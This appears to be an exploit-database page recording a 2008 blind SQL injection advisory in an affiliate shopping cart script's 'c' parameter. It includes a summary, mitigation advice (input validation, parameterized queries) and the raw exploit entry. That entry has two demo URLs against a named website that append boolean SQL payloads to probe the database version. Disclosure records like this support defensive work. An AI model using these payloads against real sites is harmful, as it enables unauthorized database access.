header-logo
Suggest Exploit
vendor:
Shopping Cart ( index.php c )
by:
Hussin X
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Shopping Cart ( index.php c )
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Shopping Cart ( index.php c ) Blind SQL Injection Vulnerability

A Blind SQL Injection vulnerability exists in Shopping Cart ( index.php c ) which allows an attacker to execute arbitrary SQL commands on the underlying database. This vulnerability is due to the lack of proper sanitization of user-supplied input to the 'c' parameter in the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands to the vulnerable script. Successful exploitation of this vulnerability can result in unauthorized access to sensitive information stored in the database, modification of data, and even execution of arbitrary system commands.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized before being used in SQL queries. Additionally, the application should use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

Shopping Cart ( index.php c )  Blind SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home :  www.IQ-TY.com  & www.TrYaG.cc

___________________________________

script    :http://www.yourfreeworld.com/script/affiliateshoppingcart.php

Demo :
_______
true & false

http://www.downlinegoldmine.com/shopcart/index.php?c=12+and+substring(@@version,1,1)=4
http://www.downlinegoldmine.com/shopcart/index.php?c=12+and+substring(@@version,1,1)=5




Greetz : All my freind

Im TrYaGi

# milw0rm.com [2008-11-02]

Navigation

Suggest Exploit

Services By CQR